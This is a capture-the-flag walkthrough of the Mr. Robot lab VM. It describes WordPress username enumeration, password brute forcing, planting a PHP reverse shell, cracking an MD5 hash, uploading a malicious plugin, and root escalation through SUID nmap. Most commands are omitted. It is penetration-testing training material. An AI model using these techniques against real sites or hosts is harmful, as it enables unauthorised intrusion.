A bug is never just a mistake.
This VM is based on the show, Mr. Robot. It has three keys hidden in different locations and the goal is to find them all.
As always we start with an nmap scan.
Nmap -sC -sV -v -p- oA nmapAll 192.168.111.164
Based on the scan we identify two open ports 80 and 443.
Browsing to robots.txt on port 80, we find the first flag and another file.
We downloaded the second file and it seems to be a wordlist.
The same case seems to be true for port 443.
Next, we run nikto on port 80.
Based on the directories returned it appears that wordpress is running on the machine.
Nothing interesting on the the wordpress blog.
We fire up wpscan but it does not return interesting results. Additionally, it is unable to enumerate users which is most likely due to no posts on the wordpress blog.
After some research, there seemed to be issues with identifying wordpress users in an automated way when no blog posts are made. The tools we looked into only seemed to be useful after valid usernames were found. With that we started to manually test usernames to determine if the error message would change providing us with confirmation on the existence of a user.
Nothing resulted for the “admin” user. We also tried other names based on the show including Tyrell and Darlene.
Elliot worked providing us the desired error message that the password was incorrect.
With a valid username and a wordlist, we attempted to brute force the login. Skimming through the wordlist, we notice a couple of duplicates. To remove duplicates we utilized the following command.
We can see that we have greatly reduced the size and saved ourselves some time when feeding this to an automated tool.
Using the wpscan tool again but with the wordlist and username flags we find the password of “ER28–0652” for the user “elliot.”
Using the credentials we are able to successfully login.
We navigate to the Appearance Editor and modify the Header Template with the php-reverse-shell from pentestmonkey.
After setting up a listener on our attacking machine and browsing to the wordpress page again, we obtain a shell
We then view the /etc/passwd file and see an interesting user named robot.
We don’t have access to view the key in his home directory but we do have access to a password file.
From the looks of it we have the md5 hash for the robot user which is “c3fcd3d76192e4007dfb496cca67e13b”
A quick search on hashes.org lets us know the password is the alphabet.
“abcdefghijklmnopqrstuvwxyz”
Using the switch user command we are able to successfully login as robot.
Now we have access to view the key file.
Since we comfortably have access as robot, I wanted to experiment with another wordpress tool that I heard about recently before going down privilege escalation. WPForce - Wordpress Attack Suite. The suite has two tools wpforce and yertle. The tools can be found at n00py’s github located here: https://github.com/n00py/WPForce.
Using WPForce we can do the same brute force technique we did earlier with wpscan.
Next, I used the Yertle component which exploits wordpress by uploading a malicious plugin.
After setting up a listener we get a shell.
We can view the malicious plugin by viewing the plugin tab in wordpress. There are flags and methods to make this tool more stealthy which n00py goes into on his site.
Onto privilege escalation. We utilize the Linux enumeration script from “rebootuser” found here: https://github.com/rebootuser/LinEnum. We always add the thorough check flag “-t” . Otherwise it won’t check for things like accessible ssh files, world-readable home directory files, suid files, guid files, and world-writable files.
Under the SUID section we find something interesting. When a binary with the suid permission is run it is run as another user, and therefore with the other users’ privileges. If the suid-bit is set on a program that can spawn a shell (in this case nmap) we could abuse that to escalate our privileges.
And if it wasn’t obvious enough the tool calls it out by itself.
In older version of nmap there is a well know trick to abuse suid permissions. We attempt to abuse the interactive mode which if present will allow us to run commands as root.
We can see that the flag to execute shell commands is “!”
With that we run the following and obtain a root shell
Note that the effective user id (euid) is root. We are able to view the last flag.
We can play with this nmap vulnerability a number of ways
We could simply do individual commands in interactive mode repeating the “!” flag for each command.
Or we could simply send a reverse shell to our machine with root rights
